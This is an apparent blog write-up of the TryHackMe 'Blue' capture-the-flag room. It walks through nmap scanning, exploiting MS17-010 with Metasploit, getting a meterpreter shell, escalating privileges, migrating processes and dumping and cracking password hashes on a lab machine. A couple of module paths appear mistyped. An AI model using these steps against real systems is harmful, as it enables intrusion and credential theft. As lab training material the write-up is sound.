TryHackMe: Blue — Writeup

5 min readApr 13, 2020

Hi,

This article is about Blue capture the flag created by DarkStar7471 on TryHackMe. It is a free room and everyone can join it after log-in to the website.

Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

This challenge teaches us how a small misconfiguration can end up your whole machine hacked. Let’s get started,

In this challenge we are provided with vulnerable machine which either can be deployed and can be accessed through openvpn given by TryHackMe or we can download can deploy on our machine.If you want to deploy machine you can by clicking on “Deploy” button or go to given link in description and download machine from there as shown in figure 1.2 below:

Reconnaissance on Deployed Machine:

When you deploy machine you will get 1 hour time by default you can add more time to machine if you need only. IP of the machine will also be displayed as shown in figure 1.3 below:

Scanning:

AS we got machine’s IP, let’s scan it with nmap.

nmap -sV -A 10.10.88.199

By running this command we got information of running ports on machine shown in figure 1.4 below:

As we came to know about these ports, let’s vuln script of nmap on this machine.

nmap 10.10.88.199 -script vuln

From this vuln script we came to know that is machine is vulnerable to ms17–010 as shown in figure 1.5 below:

Now run the Metasploit and we try to exploit this vulnerable with it to run metasploit console run the command:

msfconsole

now search for the ms17–010 exploit in the metasploit:

search ms17–010

Here we found an exploit of this machine now its time to check this exploit.

Following commands we will use to configure exploit before running on target machine:

use exploit/windows/smb/ms17_17_010_eternalblue

Figure 1.8

Now set RHOSTS with following commands:

set RHOSTS 10.10.88.199

Figure 1.9

now run the “exploit” command in order to run the configured exploit of victim machine.

exploit

Our exploit ran successfully and we got a reverse shell now let’s try to get meterpreter shell from here.

To background this shell use CTRL+Z keys. Use sessions -i command to get info related to active sessions.

then use the following from post exploitation module as written and shown in figure 1.11 below:

use post/multi/manage.shell_to_meterpreter
set LHOST <Your_IP>
sessions -i
set SESSION 1
run

You might find here that Victim machine IP is changed that is because power cut appeared on my side and lab time was finished then I have to again deploy Blue machine which results in change in ip of victim machine.

When you run above commands you will get meterpreter session type following command to get info related to session you will find a meterpreter session is active. as shown in figure 1.12 below:

sessions -i

To interact with session use command shown below in figure 1.13:

session 2

We have now connected with meterpreter session. Now let’s escalate the privileges using getsystem command as shown in figure 1.14 below:

getsystem
shell
whoami

Let’s check which processes are running on machine, for this we will use command “ps” shown in figure 1.15:

ps

Now we get our processes id with whom meterpreter shell is attached. getpid command will be used as shown in figure 1.16 below:

Figure 1.16

Migrate meterpreter process to any of the process who is atached with path C:\Windows\System32\ because processes like these have the most of the permissions. To migtare the process using command written below:

migrate <process_id>

Now in order to dump all of the hashes stored we use command shown in figure 1.17 below:

hashdump

Copy all of these Hashes in to a file and run John The Ripper on it to get password cracked.

We also got the password cracked now 3 flags are remaining to find. instead of moving directory to directory and finding manually we can use search command from meterpreter to find flag files as shown in in figure 1.19 below: